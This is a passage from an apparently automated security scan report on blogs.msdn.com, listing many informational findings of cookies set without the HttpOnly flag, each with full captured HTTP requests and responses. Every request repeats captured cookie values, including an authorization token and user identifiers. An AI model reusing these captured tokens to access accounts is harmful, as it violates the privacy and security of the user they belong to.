...IHDR............./..8....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...;h.Q......4m.C.|......VAt(8.....\t.tpu..A.A\u...":.(..J.
.m..-Bi.B....&i....~..@...7.q....._.........tK...    2#U..5.V+..
...[SNIP]...
15.41. http://blogs.msdn.com/themes/MSDN2/Images/Weblogs/icon-info.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.msdn.com
Path:   /themes/MSDN2/Images/Weblogs/icon-info.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/MSDN2/Images/Weblogs/icon-info.gif HTTP/1.1
Host: blogs.msdn.com
Proxy-Connection: keep-alive
Referer: http://blogs.msdn.com/b/sharepoint_workspace_development_team/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mstcid=e150914; omniID=1297806914247_3a81_9b84_2a24_e07e0b73e0ce; CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=d114cf6b-a8d3-4af4-869b-742773394143; communityserver-usercookie1001=lv=Thu%2c+24+Mar+2011+11%3a01%3a41+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a56+GMT; CommunityServer-UserCookie1001=lv=Wed%2c+02+Mar+2011+04%3a19%3a46+GMT&mra=Sat%2c+26+Mar+2011+01%3a34%3a35+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/gif
Last-Modified: Thu, 27 Jan 2011 20:42:07 GMT
Accept-Ranges: bytes
ETag: "6aa6a9a962becb1:0"
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: communityserver-usercookie1001=lv=Thu%2c+24+Mar+2011+11%3a01%3a41+GMT&mra=Sat%2c+26+Mar+2011+01%3a43%3a41+GMT; expires=Sun, 25-Mar-2012 01:43:41 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET01
Date: Sat, 26 Mar 2011 01:43:41 GMT
Content-Length: 895

GIF89a    .    ....h..g..b..m..v..z..z..z..f..k..m..m..u..t..{..x..z..}..k..~..x..|..~..|..|..s..}..}.........................................................................................................
...[SNIP]...
15.42. http://blogs.msdn.com/themes/MSDN2/Images/Weblogs/icon-rss.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.msdn.com
Path:   /themes/MSDN2/Images/Weblogs/icon-rss.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/MSDN2/Images/Weblogs/icon-rss.gif HTTP/1.1
Host: blogs.msdn.com
Proxy-Connection: keep-alive
Referer: http://blogs.msdn.com/b/sharepoint_workspace_development_team/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mstcid=e150914; omniID=1297806914247_3a81_9b84_2a24_e07e0b73e0ce; CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=d114cf6b-a8d3-4af4-869b-742773394143; communityserver-usercookie1001=lv=Thu%2c+24+Mar+2011+11%3a01%3a41+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a56+GMT; CommunityServer-UserCookie1001=lv=Wed%2c+02+Mar+2011+04%3a19%3a46+GMT&mra=Sat%2c+26+Mar+2011+01%3a34%3a35+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/gif
Last-Modified: Thu, 27 Jan 2011 20:42:07 GMT
Accept-Ranges: bytes
ETag: "9bea7a962becb1:0"
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Wed%2c+02+Mar+2011+04%3a19%3a46+GMT&mra=Sat%2c+26+Mar+2011+01%3a41%3a42+GMT; expires=Sun, 25-Mar-2012 01:41:42 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET01
Date: Sat, 26 Mar 2011 01:43:40 GMT
Content-Length: 301

GIF89a    .    .....N.....X..<.X3.[3.]3.a3..8..3.....%.~3.~&..A..3.....;..M.}b..~..X.....=..b..4..;..3.xM.....:..d..;.c3..3.jM.....M.......~M..!..&..9..0.p3.y3..'..+.u3..f..3..-..3.........................
...[SNIP]...
15.43. http://blogs.msdn.com/themes/MSDN2/Images/Weblogs/icon-thumbnail-list.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.msdn.com
Path:   /themes/MSDN2/Images/Weblogs/icon-thumbnail-list.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/MSDN2/Images/Weblogs/icon-thumbnail-list.gif HTTP/1.1
Host: blogs.msdn.com
Proxy-Connection: keep-alive
Referer: http://blogs.msdn.com/b/sharepoint_workspace_development_team/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mstcid=e150914; omniID=1297806914247_3a81_9b84_2a24_e07e0b73e0ce; CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=d114cf6b-a8d3-4af4-869b-742773394143; communityserver-usercookie1001=lv=Thu%2c+24+Mar+2011+11%3a01%3a41+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a56+GMT; CommunityServer-UserCookie1001=lv=Wed%2c+02+Mar+2011+04%3a19%3a46+GMT&mra=Sat%2c+26+Mar+2011+01%3a34%3a35+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/gif
Last-Modified: Thu, 27 Jan 2011 20:42:07 GMT
Accept-Ranges: bytes
ETag: "d2b3aca962becb1:0"
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a40%3a13+GMT; expires=Sun, 25-Mar-2012 01:40:13 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET01
Date: Sat, 26 Mar 2011 01:43:41 GMT
Content-Length: 451

GIF89a..........k..^..Vx.............c........y.....St.Rr.Pq.e........x..Y{....t..u..n.....y........m..n....r..]..Wz.r..[}.g..Uu.x..o..[}.o.....`.....q.................R....S........f......n.e......z
...[SNIP]...
15.44. http://blogs.msdn.com/themes/MSDN2/Images/icon-sprite.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.msdn.com
Path:   /themes/MSDN2/Images/icon-sprite.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/MSDN2/Images/icon-sprite.gif HTTP/1.1
Host: blogs.msdn.com
Proxy-Connection: keep-alive
Referer: http://blogs.msdn.com/b/sharepoint_workspace_development_team/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mstcid=e150914; omniID=1297806914247_3a81_9b84_2a24_e07e0b73e0ce; CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=d114cf6b-a8d3-4af4-869b-742773394143; communityserver-usercookie1001=lv=Thu%2c+24+Mar+2011+11%3a01%3a41+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a56+GMT; CommunityServer-UserCookie1001=lv=Wed%2c+02+Mar+2011+04%3a19%3a46+GMT&mra=Sat%2c+26+Mar+2011+01%3a34%3a35+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/gif
Last-Modified: Thu, 27 Jan 2011 20:42:05 GMT
Accept-Ranges: bytes
ETag: "22f15ca862becb1:0"
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Wed%2c+02+Mar+2011+04%3a19%3a46+GMT&mra=Sat%2c+26+Mar+2011+01%3a41%3a42+GMT; expires=Sun, 25-Mar-2012 01:41:42 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET01
Date: Sat, 26 Mar 2011 01:43:40 GMT
Content-Length: 5206

GIF89a..~..........42.#$#....[..t.$r..Fd.Ll!Xt,_|LN.lF,df4@@@LLL\^\Db||fdqrq|||.V..b.<n..[..e.,n.Fp.Rv.X~.T~.........,&.$5.6,..,.<7.<..D4.D$.46.D<.H\.4X.Hg._|.tH.X@.LD.T\.l4..4..,..,..R..d..a..r..|..L
...[SNIP]...
15.45. http://blogs.msdn.com/themes/MSDN2/Images/pager-item.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.msdn.com
Path:   /themes/MSDN2/Images/pager-item.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/MSDN2/Images/pager-item.png HTTP/1.1
Host: blogs.msdn.com
Proxy-Connection: keep-alive
Referer: http://blogs.msdn.com/b/sharepoint_workspace_development_team/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mstcid=e150914; omniID=1297806914247_3a81_9b84_2a24_e07e0b73e0ce; CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=d114cf6b-a8d3-4af4-869b-742773394143; communityserver-usercookie1001=lv=Thu%2c+24+Mar+2011+11%3a01%3a41+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a56+GMT; CommunityServer-UserCookie1001=lv=Wed%2c+02+Mar+2011+04%3a19%3a46+GMT&mra=Sat%2c+26+Mar+2011+01%3a34%3a35+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/png
Last-Modified: Thu, 27 Jan 2011 20:42:05 GMT
Accept-Ranges: bytes
ETag: "946b64a862becb1:0"
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: communityserver-usercookie1001=lv=Thu%2c+24+Mar+2011+11%3a01%3a41+GMT&mra=Sat%2c+26+Mar+2011+01%3a36%3a17+GMT; expires=Sun, 25-Mar-2012 01:36:17 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET01
Date: Sat, 26 Mar 2011 01:43:41 GMT
Content-Length: 2828

.PNG
.
...IHDR....................    pHYs...........~...
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...
15.46. http://blogs.msdn.com/themes/MSDN2/css/DynamicStyle.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.msdn.com
Path:   /themes/MSDN2/css/DynamicStyle.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/MSDN2/css/DynamicStyle.aspx?PreviewKey=0 HTTP/1.1
Host: blogs.msdn.com
Proxy-Connection: keep-alive
Referer: http://blogs.msdn.com/b/sharepoint_workspace_development_team/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mstcid=e150914; omniID=1297806914247_3a81_9b84_2a24_e07e0b73e0ce; CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+12+Mar+2011+13%3a09%3a16+GMT; communityserver-usercookie1001=lv=Sat%2c+12+Mar+2011+13%3a09%3a16+GMT&mra=Sat%2c+26+Mar+2011+01%3a43%3a29+GMT; CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=d114cf6b-a8d3-4af4-869b-742773394143

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/css; charset=utf-8
Expires: Sat, 26 Mar 2011 02:15:01 GMT
Last-Modified: Sat, 26 Mar 2011 01:45:01 GMT
ETag: 634367007015770787
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Mon%2c+28+Feb+2011+19%3a23%3a13+GMT&mra=Sat%2c+26+Mar+2011+01%3a45%3a01+GMT; expires=Sun, 25-Mar-2012 01:45:01 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
server: VBDNET01
Date: Sat, 26 Mar 2011 01:45:01 GMT
Content-Length: 2934


.content-fragment { margin: 10px; }

.layout-content.content-left-sidebar-right .layout-region.content .content-fragment,
.layout-content.sidebar-left-content-right .layout-region.left-sideba
...[SNIP]...
15.47. http://blogs.msdn.com/themes/MSDN2/css/base.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.msdn.com
Path:   /themes/MSDN2/css/base.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/MSDN2/css/base.css HTTP/1.1
Host: blogs.msdn.com
Proxy-Connection: keep-alive
Referer: http://blogs.msdn.com/b/sharepoint_workspace_development_team/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mstcid=e150914; omniID=1297806914247_3a81_9b84_2a24_e07e0b73e0ce; CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=d114cf6b-a8d3-4af4-869b-742773394143; communityserver-usercookie1001=lv=Thu%2c+24+Mar+2011+11%3a01%3a41+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a51+GMT; CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a43%3a31+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/css
Last-Modified: Thu, 27 Jan 2011 20:42:04 GMT
Accept-Ranges: bytes
ETag: "272de0a762becb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Thu%2c+24+Mar+2011+11%3a02%3a45+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a53+GMT; expires=Sun, 25-Mar-2012 01:26:53 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET01
Date: Sat, 26 Mar 2011 01:43:32 GMT
Content-Length: 29305

html, body { margin: 0; padding: 0; text-align: left; font-size: 0.87em; font-family:Arial; color: #333; }
a:link, a:visited, a:active { outline: none; color: #06d; text-decoration: none; font-weigh
...[SNIP]...
15.48. http://blogs.msdn.com/themes/MSDN2/css/content-fragments-core.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.msdn.com
Path:   /themes/MSDN2/css/content-fragments-core.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/MSDN2/css/content-fragments-core.css HTTP/1.1
Host: blogs.msdn.com
Proxy-Connection: keep-alive
Referer: http://blogs.msdn.com/b/sharepoint_workspace_development_team/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mstcid=e150914; omniID=1297806914247_3a81_9b84_2a24_e07e0b73e0ce; CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=d114cf6b-a8d3-4af4-869b-742773394143; communityserver-usercookie1001=lv=Thu%2c+24+Mar+2011+11%3a01%3a41+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a51+GMT; CommunityServer-UserCookie1001=lv=Thu%2c+24+Mar+2011+11%3a02%3a45+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a54+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/css
Last-Modified: Thu, 27 Jan 2011 20:42:04 GMT
Accept-Ranges: bytes
ETag: "1c2be1a762becb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: communityserver-usercookie1001=lv=Thu%2c+24+Mar+2011+11%3a01%3a41+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a55+GMT; expires=Sun, 25-Mar-2012 01:26:55 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET01
Date: Sat, 26 Mar 2011 01:43:33 GMT
Content-Length: 46321

.../* $Title
/******************************/
.content-fragment.title { display: none; }

/* $Bread Crumbs
/******************************/
.content-fragment.bread-crumbs { margin: 0; }

/* $E
...[SNIP]...
15.49. http://blogs.msdn.com/themes/MSDN2/css/content-fragments-forums.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.msdn.com
Path:   /themes/MSDN2/css/content-fragments-forums.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/MSDN2/css/content-fragments-forums.css HTTP/1.1
Host: blogs.msdn.com
Proxy-Connection: keep-alive
Referer: http://blogs.msdn.com/b/sharepoint_workspace_development_team/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mstcid=e150914; omniID=1297806914247_3a81_9b84_2a24_e07e0b73e0ce; CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=d114cf6b-a8d3-4af4-869b-742773394143; communityserver-usercookie1001=lv=Thu%2c+24+Mar+2011+11%3a01%3a41+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a51+GMT; CommunityServer-UserCookie1001=lv=Thu%2c+24+Mar+2011+11%3a02%3a45+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a54+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/css
Last-Modified: Thu, 27 Jan 2011 20:42:04 GMT
Accept-Ranges: bytes
ETag: "3577e2a762becb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: communityserver-usercookie1001=lv=Thu%2c+24+Mar+2011+11%3a01%3a41+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a55+GMT; expires=Sun, 25-Mar-2012 01:26:55 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET01
Date: Sat, 26 Mar 2011 01:43:33 GMT
Content-Length: 49130

/* $Forum Title
/******************************/
.content-fragment.forum-title { display: none; }

/* $Forum Banner
/******************************/
.content-fragment.forum-banner { margin: 0; }
...[SNIP]...
15.50. http://blogs.msdn.com/themes/MSDN2/css/content-fragments-groups.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.msdn.com
Path:   /themes/MSDN2/css/content-fragments-groups.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/MSDN2/css/content-fragments-groups.css HTTP/1.1
Host: blogs.msdn.com
Proxy-Connection: keep-alive
Referer: http://blogs.msdn.com/b/sharepoint_workspace_development_team/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mstcid=e150914; omniID=1297806914247_3a81_9b84_2a24_e07e0b73e0ce; CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=d114cf6b-a8d3-4af4-869b-742773394143; communityserver-usercookie1001=lv=Thu%2c+24+Mar+2011+11%3a01%3a41+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a51+GMT; CommunityServer-UserCookie1001=lv=Thu%2c+24+Mar+2011+11%3a02%3a45+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a54+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/css
Last-Modified: Thu, 27 Jan 2011 20:42:04 GMT
Accept-Ranges: bytes
ETag: "479ee2a762becb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: communityserver-usercookie1001=lv=Thu%2c+24+Mar+2011+11%3a01%3a41+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a55+GMT; expires=Sun, 25-Mar-2012 01:26:55 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET01
Date: Sat, 26 Mar 2011 01:43:33 GMT
Content-Length: 18864

/* $Group Application Links
/******************************/
.content-fragment.group-application-navigation { position: relative; }
   .content-fragment.group-application-navigation .navigation-list
...[SNIP]...
15.51. http://blogs.msdn.com/themes/MSDN2/css/content-fragments-mediagalleries.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.msdn.com
Path:   /themes/MSDN2/css/content-fragments-mediagalleries.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/MSDN2/css/content-fragments-mediagalleries.css HTTP/1.1
Host: blogs.msdn.com
Proxy-Connection: keep-alive
Referer: http://blogs.msdn.com/b/sharepoint_workspace_development_team/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mstcid=e150914; omniID=1297806914247_3a81_9b84_2a24_e07e0b73e0ce; CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=d114cf6b-a8d3-4af4-869b-742773394143; communityserver-usercookie1001=lv=Thu%2c+24+Mar+2011+11%3a01%3a41+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a51+GMT; CommunityServer-UserCookie1001=lv=Thu%2c+24+Mar+2011+11%3a02%3a45+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a54+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/css
Last-Modified: Thu, 27 Jan 2011 20:42:04 GMT
Accept-Ranges: bytes
ETag: "7559e7a762becb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: communityserver-usercookie1001=lv=Thu%2c+24+Mar+2011+11%3a01%3a41+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a55+GMT; expires=Sun, 25-Mar-2012 01:26:55 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET01
Date: Sat, 26 Mar 2011 01:43:33 GMT
Content-Length: 35321

/* $Media Gallery Title
/******************************/
.content-fragment.media-gallery-title { display: none; }

/* $Media Gallery Banner
/******************************/
.content-fragment.med
...[SNIP]...
15.52. http://blogs.msdn.com/themes/MSDN2/css/content-fragments-messages.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.msdn.com
Path:   /themes/MSDN2/css/content-fragments-messages.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/MSDN2/css/content-fragments-messages.css HTTP/1.1
Host: blogs.msdn.com
Proxy-Connection: keep-alive
Referer: http://blogs.msdn.com/b/sharepoint_workspace_development_team/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mstcid=e150914; omniID=1297806914247_3a81_9b84_2a24_e07e0b73e0ce; CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=d114cf6b-a8d3-4af4-869b-742773394143; communityserver-usercookie1001=lv=Thu%2c+24+Mar+2011+11%3a01%3a41+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a51+GMT; CommunityServer-UserCookie1001=lv=Thu%2c+24+Mar+2011+11%3a02%3a45+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a54+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/css
Last-Modified: Thu, 27 Jan 2011 20:42:04 GMT
Accept-Ranges: bytes
ETag: "c41ae9a762becb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: communityserver-usercookie1001=lv=Thu%2c+24+Mar+2011+11%3a01%3a41+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a56+GMT; expires=Sun, 25-Mar-2012 01:26:56 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET01
Date: Sat, 26 Mar 2011 01:43:35 GMT
Content-Length: 28331

/* $Activity Message List
/******************************/
.content-fragment.activity-message-list { position: relative; height: 1%; }
   .content-fragment.activity-message-list .user-avatar { displa
...[SNIP]...
15.53. http://blogs.msdn.com/themes/MSDN2/css/content-fragments-weblogs.css  previous  next

Summary

